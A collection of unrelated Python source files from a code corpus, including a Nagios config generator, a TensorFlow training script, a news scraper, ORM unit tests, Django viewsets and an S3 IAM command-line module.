self.write_definition(fhandle, 'host', dct_dict)
i += 1
logging.info("Written %i 'datacenter' definitions.", i)
def write_definition(self, fhandle, definition_str, some_dict):
"""Write Nagios definition into given file pointer."""
stuffing_len = 0
dict_keys = some_dict.keys()
dict_keys.sort()
# figure-out padding len
for attribute in dict_keys:
if len(attribute) > stuffing_len:
stuffing_len = len(attribute)
stuffing_len += 1
fhandle.write('define %s {\n' % (definition_str))
for attribute in dict_keys:
padding_len = stuffing_len - len(attribute)
padding = self.get_padding(padding_len)
fhandle.write(' %s%s%s\n' % (attribute, padding,
some_dict[attribute]))
fhandle.write('}\n\n')
def write_hostgroup_definitions(self):
"""Write hostgroup definitions."""
hosts = self.nagios_db['hosts']
hostgroups = self.nagios_db['hostgroups']
for host in hosts.iterkeys():
if 'hostgroups' not in hosts[host]:
continue
for hostgroup in hosts[host]['hostgroups']:
if hostgroup not in hostgroups:
hostgroups[hostgroup] = {}
# add 'members' attribute if hostgroup doesn't have any
if 'members' not in hostgroups[hostgroup]:
hostgroups[hostgroup]['members'] = list()
if host in hostgroups[hostgroup]['members']:
continue
hostgroups[hostgroup]['members'].append(host)
dctrs = self.nagios_db['datacenters']
for dctr in dctrs.iterkeys():
if 'hostgroups' not in dctrs[dctr]:
continue
for hostgroup in dctrs[dctr]['hostgroups']:
if hostgroup not in hostgroups:
hostgroups[hostgroup] = {}
# add 'members' attribute if hostgroup doesn't have any
if 'members' not in hostgroups[hostgroup]:
hostgroups[hostgroup]['members'] = list()
if dctr in hostgroups[hostgroup]['members']:
continue
hostgroups[hostgroup]['members'].append(dctr)
hgroups_file = '%s/objects/hostgroups.cfg' % (ICINGA_DIR)
fhandle = open(hgroups_file, 'w+')
i = 0
for hgrp_key in hostgroups.iterkeys():
hostgroup = hostgroups[hgrp_key]
if 'members' in hostgroup:
if len(hostgroup['members']) < 1:
# I guess Nagios wouldn't like empty members
hostgroup.pop('members')
else:
# Yes, let's change 'list' to 'string' and make it easy on
# printer
hostgroup['members'] = ','.join(hostgroup['members'])
hostgroup['hostgroup_name'] = hgrp_key
self.write_definition(fhandle, 'hostgroup', hostgroup)
i += 1
fhandle.close()
logging.info("Written %i 'hostgroup' definitions.", i)
def write_service_definitions(self):
"""Write service definitons."""
if 'active' not in self.nagios_db['services']:
return
services_file = '%s/objects/services.cfg' % (ICINGA_DIR)
fhandle = open(services_file, 'w+')
i = 0
for svc_key in self.nagios_db['services']['active'].iterkeys():
service = self.nagios_db['services']['active'][svc_key]
service['service_description'] = svc_key
if 'use' not in service:
service['use'] = 'generic-service'
self.write_definition(fhandle, 'service', service)
i += 1
fhandle.close()
logging.info("Written %i 'service' definitions.", i)
def convert_nagios_config():
"""Convert given Nagios config into YAML."""
if len(sys.argv) != 4:
logging.error('Expected %i arguments, %i given.', 3, len(sys.argv) - 1)
sys.exit(1)
nagios_to_yaml = NagiosToYaml()
nagios_to_yaml.parse_nagios_config(sys.argv[2])
nagios_to_yaml.write_to_yaml(sys.argv[3])
def import_remote_config():
"""Imports config sent from Remote Host."""
if len(sys.argv) < 3:
logging.error('Expected %i arguments, %i given.', 2, len(sys.argv) - 1)
sys.exit(1)
cfg_file = sys.argv[2]
config_generator = NagiosConfigGenerator()
retval = config_generator.run(cfg_file)
if retval == True:
logging.info("Will remove '%s'.", cfg_file)
os.remove(cfg_file)
os.remove('%s.ok' % (cfg_file))
print '* run % icinga -v /etc/icinga/icinga.cfg; before reload!'
print "* don't forget to commit your changes"
def main():
"""Main."""
logging.basicConfig(format=LOG_FORMAT)
logging.getLogger().setLevel(logging.INFO)
if len(sys.argv) < 2:
logging.error('Not enough arguments given.')
print_help()
sys.exit(1)
action = sys.argv[1]
if action == 'help':
print_help()
elif action == 'import':
import_remote_config()
elif action == 'regen':
regenerate_nagios_config()
elif action == 'convert':
convert_nagios_config()
else:
logging.error("Invalid parameter '%s'.", action)
sys.exit(1)
def print_help():
"""Print help."""
print '%s <action> [params]' % (sys.argv[0])
print ''
print 'Actions and params:'
print ' convert <src> <tgt> - convert Nagios config(src) to YAML(tgt)'
print ''
print ' import <path_to_cfg> - import configuration from remote Host'
print ''
print "NOTE: It's possible for 'regen' to create inconsistent Nagios"
print ' configuration! Use with care!'
print ' regen <what> - regenerates given definitions'
print ' commands - command definitons'
print ' contacts - contact definitions'
print ' contactgroups - contactgroup definitions'
print ' datacenters - datacenter definitions'
print ' hostgroups - hostgroup definitions'
print ' services - (active) service definitions'
def regenerate_nagios_config():
"""Regenerate part of Nagios config."""
if len(sys.argv) < 3:
logging.error('Expected %i parameters, %i given.', 2, len(sys.argv) - 1)
sys.exit(1)
config_generator = NagiosConfigGenerator()
config_generator.ensure_host_definitions()
what = sys.argv[2]
if what == 'commands':
config_generator.write_command_definitions()
elif what == 'contacts':
config_generator.write_contact_definitions()
elif what == 'contactgroups':
config_generator.write_contactgroup_definitions()
elif what == 'datacenters':
config_generator.write_datacenter_definitions()
elif what == 'hostgroups':
config_generator.write_hostgroup_definitions()
elif what == 'services':
config_generator.write_service_definitions()
else:
logging.error("Unknown parameter '%s'.", what)
sys.exit(1)
if __name__ == '__main__':
main()
| StarcoderdataPython |
1643023 | #! /usr/bin/env python
import tensorflow as tf
import numpy as np
import os
import time
import datetime
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
from builddata_ecir import *
from capsuleNet_SEARCH17 import CapsE
np.random.seed(1234)
tf.set_random_seed(1234)
# Parameters
# ==================================================
parser = ArgumentParser("CapsE", formatter_class=ArgumentDefaultsHelpFormatter, conflict_handler='resolve')
parser.add_argument("--data", default="./data/", help="Data sources.")
parser.add_argument("--run_folder", default="./", help="Data sources.")
parser.add_argument("--name", default="SEARCH17", help="Name of the dataset.")
parser.add_argument("--embedding_dim", default=200, type=int, help="Dimensionality of character embedding (fixed: 200)")
parser.add_argument("--filter_size", default=1, type=int, help="Comma-separated filter sizes (default: '3,4,5')")
parser.add_argument("--num_filters", default=400, type=int, help="Number of filters per filter size (default: 128)")
parser.add_argument("--learning_rate", default=0.00001, type=float, help="Learning rate")
parser.add_argument("--batch_size", default=128, type=int, help="Batch Size")
parser.add_argument("--neg_ratio", default=1.0, help="Number of negative triples generated by positive (default: 1.0)")
parser.add_argument("--useInitialization", default=True, type=bool, help="Using the pretrained embeddings")
parser.add_argument("--num_epochs", default=100, type=int, help="Number of training epochs")
parser.add_argument("--savedEpochs", default=10, type=int, help="")
parser.add_argument("--allow_soft_placement", default=True, type=bool, help="Allow device soft device placement")
parser.add_argument("--log_device_placement", default=False, type=bool, help="Log placement of ops on devices")
parser.add_argument("--model_name", default='search17model', help="")
parser.add_argument("--useConstantInit", action='store_true')
parser.add_argument('--iter_routing', default=1, type=int, help='number of iterations in routing algorithm')
parser.add_argument('--num_outputs_secondCaps', default=1, type=int, help='')
parser.add_argument('--vec_len_secondCaps', default=10, type=int, help='')
args = parser.parse_args()
print(args)
# Load data
# Load data
print("Loading data...")
train_triples, train_rank_triples, train_val_triples, valid_triples, valid_rank_triples, valid_val_triples, \
test_triples, test_rank_triples, test_val_triples, query_indexes, user_indexes, doc_indexes, \
indexes_query, indexes_user, indexes_doc = build_data_ecir()
data_size = len(train_triples)
train_batch = Batch_Loader_ecir(train_triples, train_val_triples, batch_size=args.batch_size)
assert args.embedding_dim % 200 == 0
pretrained_query = init_dataset_ecir(args.data + args.name + '/query2vec.200.init')
pretrained_user = init_dataset_ecir(args.data + args.name + '/user2vec.200.init')
pretrained_doc = init_dataset_ecir(args.data + args.name + '/doc2vec.200.init')
print("Using pre-trained initialization.")
lstEmbedQuery = assignEmbeddings(pretrained_query, query_indexes)
lstEmbedUser = assignEmbeddings(pretrained_user, user_indexes)
lstEmbedDoc = assignEmbeddings(pretrained_doc, doc_indexes)
lstEmbedQuery = np.array(lstEmbedQuery, dtype=np.float32)
lstEmbedUser = np.array(lstEmbedUser, dtype=np.float32)
lstEmbedDoc = np.array(lstEmbedDoc, dtype=np.float32)
print("Loading data... finished!")
# Training
# ==================================================
with tf.Graph().as_default():
session_conf = tf.ConfigProto(allow_soft_placement=args.allow_soft_placement, log_device_placement=args.log_device_placement)
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
with sess.as_default():
global_step = tf.Variable(0, name="global_step", trainable=False)
capse = CapsE(sequence_length=3,
batch_size=20 * args.batch_size,
initialization=[lstEmbedQuery, lstEmbedUser, lstEmbedDoc],
embedding_size=200,
filter_size=args.filter_size,
num_filters=args.num_filters,
iter_routing=args.iter_routing,
num_outputs_secondCaps=args.num_outputs_secondCaps,
vec_len_secondCaps=args.vec_len_secondCaps,
useConstantInit=args.useConstantInit
)
# Define Training procedure
#optimizer = tf.contrib.opt.NadamOptimizer(1e-3)
optimizer = tf.train.AdamOptimizer(learning_rate=args.learning_rate)
#optimizer = tf.train.RMSPropOptimizer(learning_rate=args.learning_rate)
#optimizer = tf.train.GradientDescentOptimizer(learning_rate=args.learning_rate)
grads_and_vars = optimizer.compute_gradients(capse.total_loss)
train_op = optimizer.apply_gradients(grads_and_vars, global_step=global_step)
out_dir = os.path.abspath(os.path.join(args.run_folder, "runs_CapsE_SEARCH17", args.model_name))
print("Writing to {}\n".format(out_dir))
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
checkpoint_prefix = os.path.join(checkpoint_dir, "model")
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
# Initialize all variables
sess.run(tf.global_variables_initializer())
def train_step(x_batch, y_batch):
"""
A single training step
"""
feed_dict = {
capse.input_x: x_batch,
capse.input_y: y_batch
}
_, step, loss = sess.run([train_op, global_step, capse.total_loss], feed_dict)
return loss
# Predict function to predict scores for test data
def predict(x_batch, y_batch):
feed_dict = {
capse.input_x: x_batch,
capse.input_y: y_batch,
capse.dropout_keep_prob: 1.0
}
scores = sess.run([capse.predictions], feed_dict)
return scores
def test_prediction(x_batch, y_batch, lstOriginalRank):
new_x_batch = np.concatenate(x_batch)
new_y_batch = np.concatenate(y_batch, axis=0)
while len(new_x_batch) % (args.batch_size * 20) != 0:
new_x_batch = np.append(new_x_batch, np.array([new_x_batch[-1]]), axis=0)
new_y_batch = np.append(new_y_batch, np.array([new_y_batch[-1]]), axis=0)
results = []
listIndexes = range(0, len(new_x_batch), 20 * args.batch_size)
for tmpIndex in range(len(listIndexes) - 1):
results = np.append(results,
predict(new_x_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex + 1]],
new_y_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex + 1]]))
results = np.append(results,
predict(new_x_batch[listIndexes[-1]:], new_y_batch[listIndexes[-1]:]))
lstresults = []
_start = 0
for tmp in lstOriginalRank:
_end = _start + len(tmp)
lstsorted = np.argsort(results[_start:_end])
lstresults.append(np.where(lstsorted == 0)[0] + 1)
_start = _end
return lstresults
wri = open(checkpoint_prefix + '.cls.' + '.txt', 'w')
lstvalid_mrr = []
lsttest_mrr = []
num_batches_per_epoch = int((data_size - 1) / (args.batch_size)) + 1
for epoch in range(args.num_epochs):
for batch_num in range(num_batches_per_epoch):
x_batch, y_batch = train_batch()
train_step(x_batch, y_batch)
current_step = tf.train.global_step(sess, global_step)
valid_results = test_prediction(valid_triples, valid_val_triples, valid_rank_triples)
test_results = test_prediction(test_triples, test_val_triples, test_rank_triples)
valid_mrr = computeMRR(valid_results)
test_mrr = computeMRR(test_results)
test_p1 = computeP1(test_results)
lstvalid_mrr.append(valid_mrr)
lsttest_mrr.append([test_mrr, test_p1])
wri.write("epoch " + str(epoch) + ": " + str(valid_mrr) + " " + str(test_mrr) + " " + str(test_p1) + "\n")
index_valid_max = np.argmax(lstvalid_mrr)
wri.write("\n--------------------------\n")
wri.write("\nBest mrr in valid at epoch " + str(index_valid_max) + ": " + str(lstvalid_mrr[index_valid_max]) + "\n")
wri.write("\nMRR and P1 in test: " + str(lsttest_mrr[index_valid_max][0]) + " " + str(lsttest_mrr[index_valid_max][1]) + "\n")
wri.close()
| StarcoderdataPython |
3363506 | <reponame>epfl-dcsl/ptf-persona<filename>app/simple.py
# Copyright 2019 École Polytechnique <NAME>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from app import app
from modules.simple import stage as simple_stage
from common.parse import numeric_min_checker
import itertools
import logging
logging.basicConfig(level=logging.DEBUG)
import tensorflow as tf
import tensorflow.contrib.gate as gate
class Simple(app.Application):
app_dtypes = (tf.int32,)
app_shapes = ((),)
log = logging.getLogger("Simple")
log.setLevel(level=logging.DEBUG) # don't know why basicConfig() isn't doing this
@staticmethod
def name():
return "simple"
@staticmethod
def help_message():
return "run a simple increment app"
@classmethod
def device_counts(cls, args):
return { "": args.stages }
@classmethod
def _make_graph_args(cls, parser):
simple_stage.Incrementer.add_graph_args(parser=parser)
parser.add_argument("--stages", default=1, type=numeric_min_checker(minimum=1, message="need at least one stage!"), help="number of stages to run in parallel")
def _construct_graph(self, args, device_map, num_client_slots):
gate_name = "ingress_gate"
capacity_between_gates = int(num_client_slots*1.5)
ingress = gate.IngressGate(dtypes=self.app_dtypes, shapes=self.app_shapes, capacity=capacity_between_gates,
shared_name=gate_name, name=gate_name)
stages = tuple(simple_stage.Incrementer(args=args) for _ in range(args.stages))
devices = device_map[""]
assert len(devices) == len(stages)
def make_outputs():
for device, stage in zip(devices, stages):
with device:
yield stage.make_graph(upstream_gate=ingress)
outputs = tuple(make_outputs())
example_output = outputs[0]
egress = gate.EgressGate(capacity=capacity_between_gates, sample_tensors=example_output[1:], id_and_count_upstream=example_output[0], join=True,
name="egress_gate")
enqueue_ops = tuple(egress.enqueue(id_and_count=a[0], components=a[1:]) for a in outputs)
gate.add_gate_runner(gate_runner=gate.GateRunner(gate=egress, enqueue_ops=enqueue_ops,
device=egress.device)) # ideally, each local device would run its own gate runner, but we're running everything locally to make it easy
gate.add_credit_supplier_from_gates(upstream_gate=ingress, downstream_gate=egress)
self.close_op = (ingress.close(), egress.close())
unknown_shape = tf.TensorShape([None])
batch_ingress_shapes = tuple(unknown_shape.concatenate(ishape) for ishape in self.app_shapes)
for _ in range(num_client_slots):
ingress_placeholders = tuple(tf.placeholder(dtype=dtype, shape=shape) for dtype, shape in zip(self.app_dtypes, batch_ingress_shapes))
ingress_enqueue = ingress.enqueue_request(components=ingress_placeholders)
egress_dequeue = egress.dequeue_request(request_id=ingress_enqueue)
yield self.ClientSlot(ingress_placeholders=ingress_placeholders, egress_dequeue=egress_dequeue)
@classmethod
def make_client_args(cls, parser):
parser.add_argument("numbers", nargs="+", type=int, help="integers to increment in this pipeline")
@classmethod
def process_ingress_args(cls, args):
return args.numbers
@classmethod
def process_egress_results(cls, results, args):
cls.log.info("Got results: {}".format(results))
def _run_client_request(self, client_args, client_slot, sess):
client_args = tuple(client_args)
ingress_placeholder = client_slot.ingress_placeholders[0]
egress_dequeue = client_slot.egress_dequeue
a = sess.run(egress_dequeue, feed_dict={ingress_placeholder: client_args})
return tuple(itertools.chain.from_iterable(a[0].tolist())) #flattens it out to (0,1,2) instead of ((0),(1),(2))
def stop(self, sess):
sess.run(self.close_op)
| StarcoderdataPython |
1709088 | # -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import lxml
import json
import time
from random import randrange
FILE = 'ParseResults.csv'
HOST = 'https://www.citilink.ru/catalog/smartfony/'
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/'
'537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 OPR/82.0.4227.50',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image'
'/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
def get_article_urls(url):
s = requests.Session()
response = s.get(url=url, headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
pagination_count = int(soup.find('span', class_='navigations').find_all('a')[-1].text)
articles_urls_list = []
for page in range(1, pagination_count + 1):
response = s.get(url=f'https://hi-tech.news/page/{page}/', headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
articles_urls = soup.find_all('a', 'post-title-a')
for au in articles_urls:
art_url = au.get('href')
articles_urls_list.append(art_url)
time.sleep(randrange(2, 5))
print(f'Обработал {page} страницу из {pagination_count} ')
with open('articles_urls.txt', 'w') as file:
for url in articles_urls_list:
file.write(f'{url}\n')
return 'Работа по сбору ссылок завершена'
def get_data(file_path):
with open(file_path) as file:
urls_list = [line.strip() for line in file.readlines()]
urls_count = len(urls_list)
s = requests.Session()
result_data = []
for url in enumerate(urls_list):
response = s.get(url=url[1], headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
article_title = soup.find('div', class_='post-content').find('h1', class_='title').text.strip()
article_data = soup.find('div', class_='post').find('div', class_='tile-views').text.strip()
article_img = f"https://hi-tech.news{soup.find('div', class_='post-media-full').find('img').get('src')}"
article_text = soup.find('div', class_='the-excerpt').text.strip().replace('\n', '')
result_data.append({
'Original_url': url[1],
'Title': article_title,
'Data': article_data,
'Img': article_img,
'Article_Text': article_text,
})
# print(f'{article_title}\n{article_data}\n{article_img}\n')
time.sleep(randrange(1, 2))
print(f'Обработано {url[0]+1}/{urls_count}')
with open('result.json', 'w', encoding='utf-8') as file:
json.dump(result_data, file, indent=4, ensure_ascii=False)
def main():
# print(get_article_urls(url='https://hi-tech.news'))
get_data('articles_urls.txt')
if __name__ == '__main__':
main()
| StarcoderdataPython |
3283558 | from unittest import TestCase
from piccolo.apps.user.tables import BaseUser
from piccolo.conf.apps import AppRegistry, AppConfig, table_finder
from ..example_app.tables import Manager
class TestAppRegistry(TestCase):
def test_get_app_config(self):
app_registry = AppRegistry(apps=["piccolo.apps.user.piccolo_app"])
app_config = app_registry.get_app_config(app_name="user")
self.assertTrue(isinstance(app_config, AppConfig))
def test_get_table_classes(self):
app_registry = AppRegistry(apps=["piccolo.apps.user.piccolo_app"])
table_classes = app_registry.get_table_classes(app_name="user")
self.assertTrue(BaseUser in table_classes)
with self.assertRaises(ValueError):
app_registry.get_table_classes(app_name="Foo")
def test_duplicate_app_names(self):
"""
An exception should be if apps with duplicate names are registered.
"""
with self.assertRaises(ValueError):
AppRegistry(
apps=[
"piccolo.apps.user.piccolo_app",
"piccolo.apps.user.piccolo_app",
]
)
def test_get_table_with_name(self):
app_registry = AppRegistry(apps=["piccolo.apps.user.piccolo_app"])
table = app_registry.get_table_with_name(
app_name="user", table_class_name="BaseUser"
)
self.assertEqual(table, BaseUser)
class TestAppConfig(TestCase):
def test_get_table_with_name(self):
"""
Register a table, then test retrieving it.
"""
config = AppConfig(app_name="Music", migrations_folder_path="")
config.register_table(table_class=Manager)
self.assertEqual(config.get_table_with_name("Manager"), Manager)
with self.assertRaises(ValueError):
config.get_table_with_name("Foo")
class TestTableFinder(TestCase):
def test_table_finder(self):
"""
Should return all Table subclasses.
"""
tables = table_finder(modules=["tests.example_app.tables"])
table_class_names = [i.__name__ for i in tables]
table_class_names.sort()
self.assertEqual(
table_class_names,
["Band", "Concert", "Manager", "Poster", "Ticket", "Venue"],
)
with self.assertRaises(ImportError):
table_finder(modules=["foo.bar.baz"])
def test_table_finder_coercion(self):
"""
Should convert a string argument to a list.
"""
tables = table_finder(modules="tests.example_app.tables")
table_class_names = [i.__name__ for i in tables]
table_class_names.sort()
self.assertEqual(
table_class_names,
["Band", "Concert", "Manager", "Poster", "Ticket", "Venue"],
)
def test_include_tags(self):
"""
Should return all Table subclasses with a matching tag.
"""
tables = table_finder(
modules=["tests.example_app.tables"], include_tags=["special"]
)
table_class_names = [i.__name__ for i in tables]
table_class_names.sort()
self.assertEqual(
table_class_names, ["Poster"],
)
def test_exclude_tags(self):
"""
Should return all Table subclasses without the specified tags.
"""
tables = table_finder(
modules=["tests.example_app.tables"], exclude_tags=["special"]
)
table_class_names = [i.__name__ for i in tables]
table_class_names.sort()
self.assertEqual(
table_class_names,
["Band", "Concert", "Manager", "Ticket", "Venue"],
)
| StarcoderdataPython |
3267824 | <filename>LeetCode_easy/1-bit&2-bitCharacters_717.py
# -*- coding: utf-8 -*-
'''
717. 1-bit and 2-bit Characters
We have two special characters. The first character can be represented by one bit 0. The second character can be represented by two bits (10 or 11).
Now given a string represented by several bits. Return whether the last character must be a one-bit character or not. The given string will always end with a zero.
Example 1:
Input:
bits = [1, 0, 0]
Output: True
Explanation:
The only way to decode it is two-bit character and one-bit character. So the last character is one-bit character.
Example 2:
Input:
bits = [1, 1, 1, 0]
Output: False
Explanation:
The only way to decode it is two-bit character and two-bit character. So the last character is NOT one-bit character.
Note:
1 <= len(bits) <= 1000.
bits[i] is always 0 or 1.
'''
class Solution():
#按照题意,给定的元素只能是0,10,11,而且最后一位必须是0
#从头开始遍历直到倒数第二位(最后一位必然是0),遇到0 j+=1遇到1 j+=2 最后判断j和len(nums)-1就是结果
def is_one_bit_character(self,nums):
j = 0
nums_size = len(nums)
while j < nums_size-1:
j = j + 1 if nums[j] == 0 else j + 2
# print(j)
return j == nums_size-1
if __name__ == "__main__":
input = [1, 1, 1, 0]
solution=Solution()
result = solution.is_one_bit_character(input)
print(result)
# 生成位数为n的0-1随机数组方法如下
import random
n = 10
list = [random.randint(0,1) for i in range(n-1)]
list.append(0)
print(list)
| StarcoderdataPython |
3238233 | from django.contrib.auth.models import User, Group
from restapp.models import Character
from rest_framework import viewsets
from restapp.serializers import UserSerializer, GroupSerializer, CharacterSerializer
from rest_framework.permissions import IsAuthenticatedOrReadOnly, IsAuthenticated
from django.shortcuts import render
from django.utils import timezone
from django.views import generic
class UserViewSet(viewsets.ModelViewSet):
permission_classes = (IsAuthenticated,)
"""
API endpoint that allows users to be viewed or edited.
"""
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
permission_classes = (IsAuthenticated,)
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Group.objects.all()
serializer_class = GroupSerializer
class CharacterViewSet(viewsets.ModelViewSet):
permission_classes = (IsAuthenticatedOrReadOnly,)
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Character.objects.all()
serializer_class = CharacterSerializer
def home_page(request):
# posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')
return render(request, 'restapp/index.html', {'data': " "})
| StarcoderdataPython |
1636057 | <gh_stars>10-100
# -*- coding: utf-8 -*-
import configparser
import os
cfile = os.path.join(os.path.dirname(__file__), 'config.ini')
cfg = configparser.ConfigParser()
cfg.read(cfile)
try:
cfg.has_section('API')
except:
raise Exception('Config File was not read.')
def get_urlroot():
urlroot = cfg['API']['url_root']
return urlroot
def get_urlrootfmp():
urlrootfmp = cfg['API']['url_root_fmp']
return urlrootfmp
def get_apikey():
apikey = cfg['API']['api_key']
return apikey
def set_apikey(apikey):
cfg['API']['api_key'] = apikey
with open(cfile, 'w') as configfile:
cfg.write(configfile)
| StarcoderdataPython |
4801058 | <reponame>dan-fritchman/Hdl21<filename>scratch/diff.py
"""
# Hdl21 Differential Bundle and Facilities for Differential Circuits
"""
from pydantic.dataclasses import dataclass
# Local imports
from .signal import Signal
from .bundle import bundle
from .instantiable import Instantiable
@bundle
class DiffSomething:
""" Differential Bundle """
p = Signal(width=1, desc="Positive")
n = Signal(width=1, desc="Negative")
@dataclass
class DiffSomethingElse:
""" Differential Instance Bundle """
of: Instantiable # Target Module
conns: Dict[str, Any] # Really [str, Connectable]
def diff_inst(of: Instantiable) -> DiffSomethingElse:
""" Create a Differential Instance Bundle """
return DiffSomethingElse(of=of, conns={})
| StarcoderdataPython |
3375465 | <filename>auth-utils/s3iamcli/s3iamcli/accountloginprofile.py<gh_stars>10-100
#
# Copyright (c) 2020 Seagate Technology LLC and/or its Affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For any questions about this software or licensing,
# please email <EMAIL> or <EMAIL>.
#
import http.client, urllib.parse
import sys
import datetime
from s3iamcli.util import sign_request_v2
from s3iamcli.util import sign_request_v4
from s3iamcli.util import get_timestamp
from s3iamcli.conn_manager import ConnMan
from s3iamcli.error_response import ErrorResponse
from s3iamcli.create_accountloginprofile_response import CreateAccountLoginProfileResponse
from s3iamcli.get_accountloginprofile_response import GetAccountLoginProfileResponse
from s3iamcli.list_account_response import ListAccountResponse
from s3iamcli.reset_key_response import ResetAccountAccessKey
from s3iamcli.config import Config
from s3iamcli.cli_response import CLIResponse
class AccountLoginProfile:
def __init__(self, iam_client, cli_args):
self.iam_client = iam_client
self.cli_args = cli_args
# list all accounts
def list(self):
# Get host value from url https://iam.seagate.com:9443
if(self.cli_args.name is None):
message = "Account name is required."
CLIResponse.send_error_out(message)
url_parse_result = urllib.parse.urlparse(Config.endpoint)
epoch_t = datetime.datetime.utcnow();
body = urllib.parse.urlencode({'Action' : 'GetAccountLoginProfile','AccountName' : self.cli_args.name})
headers = {'content-type': 'application/x-www-form-urlencoded',
'Accept': 'text/plain'}
headers['Authorization'] = sign_request_v4('POST', '/', body, epoch_t,
url_parse_result.netloc, Config.service, Config.default_region);
headers['X-Amz-Date'] = get_timestamp(epoch_t);
if(self.cli_args.session_token is not None):
headers['X-Amz-Security-Token'] = self.cli_args.session_token;
if(headers['Authorization'] is None):
message = "Failed to generate v4 signature"
CLIResponse.send_error_out(message)
response = ConnMan.send_post_request(body, headers)
if response['status'] == 200:
accounts = GetAccountLoginProfileResponse(response)
if accounts.is_valid_response():
accounts.print_account_login_profile_info()
else:
# unlikely message corruption case in network
message = "Failed to list login profile"
CLIResponse.send_success_out(message)
elif(response['status'] == 503):
message = "Failed to get login profile\n" \
"An error occurred (503) when calling the GetAccountLoginProfile operation : " + response['reason']
CLIResponse.send_error_out(message)
else:
message = "Failed to get login profile\n"
error = ErrorResponse(response)
message += error.get_error_message()
CLIResponse.send_error_out(message)
def create(self):
if(self.cli_args.name is None or self.cli_args.name is ''):
message = "Account name is required"
CLIResponse.send_error_out(message)
if(self.cli_args.password is None):
message = "Account login password is required"
CLIResponse.send_error_out(message)
passwordResetRequired = False;
if(self.cli_args.password_reset_required):
passwordResetRequired = True
# Get host value from url https://iam.seagate.com:9443
url_parse_result = urllib.parse.urlparse(Config.endpoint)
epoch_t = datetime.datetime.utcnow();
body = urllib.parse.urlencode({'Action' : 'CreateAccountLoginProfile',
'AccountName' : self.cli_args.name, 'Password' : self.cli_args.password,
'PasswordResetRequired' : passwordReset<PASSWORD>})
headers = {'content-type': 'application/x-www-form-urlencoded',
'Accept': 'text/plain'}
headers['Authorization'] = sign_request_v4('POST', '/', body, epoch_t, url_parse_result.netloc,
Config.service, Config.default_region);
headers['X-Amz-Date'] = get_timestamp(epoch_t);
if(headers['Authorization'] is None):
message = "Failed to generate v4 signature"
CLIResponse.send_error_out(message)
result = ConnMan.send_post_request(body, headers)
# Validate response
if(result['status'] == 201):
profile = CreateAccountLoginProfileResponse(result)
if profile.is_valid_response():
profile.print_profile_info()
else:
# unlikely message corruption case in network
message = "Account login profile was created. For details try get account login profile."
CLIResponse.send_success_out(message)
elif(result['status'] == 503):
message = "Failed to create Account login profile.\n" \
"An error occurred (503) when calling the CreateAccountLoginProfile operation : " + result['reason']
CLIResponse.send_error_out(message)
else:
message = "Failed to create Account login profile.\n"
error = ErrorResponse(result)
message += error.get_error_message()
CLIResponse.send_error_out(message)
def update(self):
if(self.cli_args.name is None):
message = "Account name is required for UpdateAccountLoginProfile"
CLIResponse.send_error_out(message)
passwordResetRequired = False
if(self.cli_args.password_reset_required):
passwordResetRequired = True
if(self.cli_args.password is None) and (self.cli_args.password_reset_required is False) and (self.cli_args.no_password_reset_required is False):
message = "Please provide password or password-reset flag"
CLIResponse.send_error_out(message)
# Get host value from url https://iam.seagate.com:9443
url_parse_result = urllib.parse.urlparse(Config.endpoint)
epoch_t = datetime.datetime.utcnow();
if(self.cli_args.password is None):
body = urllib.parse.urlencode({'Action' : 'UpdateAccountLoginProfile',
'AccountName' : self.cli_args.name, 'PasswordResetRequired' : passwordResetRequired})
else:
body = urllib.parse.urlencode({'Action' : 'UpdateAccountLoginProfile',
'AccountName' : self.cli_args.name, 'Password' : <PASSWORD>,
'PasswordResetRequired' : <PASSWORD>})
headers = {'content-type': 'application/x-www-form-urlencoded',
'Accept': 'text/plain'}
headers['Authorization'] = sign_request_v4('POST', '/', body, epoch_t, url_parse_result.netloc,
Config.service, Config.default_region);
headers['X-Amz-Date'] = get_timestamp(epoch_t);
if(self.cli_args.session_token is not None):
headers['X-Amz-Security-Token'] = self.cli_args.session_token;
if(headers['Authorization'] is None):
message = "Failed to generate v4 signature"
CLIResponse.send_error_out(message)
result = ConnMan.send_post_request(body, headers)
# Validate response
if(result['status'] == 200):
message = "Account login profile updated."
CLIResponse.send_success_out(message)
elif(result['status'] == 503):
message = "Failed to update Account login profile.\n" \
"An error occurred (503) when calling the UpdateAccountLoginProfile operation : " + result['reason']
CLIResponse.send_error_out(message)
else:
message = "Account login profile wasn't Updated."
error = ErrorResponse(result)
message += error.get_error_message()
CLIResponse.send_error_out(message)
| StarcoderdataPython |
174970 | <reponame>cgmark101/mark1-translate
import re, requests
agent = {
